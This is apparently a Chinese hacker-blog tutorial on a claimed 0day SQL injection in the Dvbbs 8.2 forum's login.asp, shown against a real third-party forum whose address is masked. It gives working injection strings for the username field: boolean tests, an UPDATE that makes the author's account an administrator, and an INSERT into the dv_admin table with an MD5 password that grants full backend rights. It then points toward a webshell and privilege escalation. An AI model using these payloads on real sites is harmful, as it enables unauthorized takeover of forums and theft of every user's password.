中国应用最广泛的论坛程序，最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号，导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
特别注意：admin等。。。必须在论坛有注册。。。
就是登陆名必须是已经在论坛注册了的。。




随便找了一个论坛http://www.*******.net/首先注册一个帐户“hxhack”然后访问其登陆页面



在用户名处写入“hxhack' and 'a'='a”密码随便登陆看到其返回信息如图




看用户名或密码不正确，然后我们在“hxhack' and 'a'='b”返回的信息如图



很明显我们能发现第一次提交正确和第二次提交的不正确时两者返回的信息有着明显的差别。就说明他是可以利用的。那我就来将我的帐户提升为管理员吧！在用户名处写入“';update dv_user set usergroupid=1 where username='hxhack'--”密码我就用正确的来写然后写好后登陆看到反回的信息




我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“hxhack”已经为管理员了。

现在我们已经是前台管理员了。

那么怎样才能让我们的帐户具有后台权限呢？我们继续来到login.asp这个登陆页面。在用户名处写入“hxhack';insert into dv_admin (username,password,flag,adduser) values


('hxhack','a5258dfb597d7a1a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,


24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','hxhack')--”其中的“a5258dfb597d7a1a”是“hxhack”的MD5加密后的值，也就是说我们这里提升为后台管理权限的帐户的后台管理密码为“hxhack”。之后我们看看能否登陆后台，哈哈RP还行，成功了如图




接来呢就是看看能否拿到webshell甚至提权了。这里我就不搞了
好了其实这个漏洞并没有什么 ，至于ACCESS这个数据库的利用比较麻烦（本人比较懒就不搞了）！希望这篇菜鸟级的文章能给你一点收获。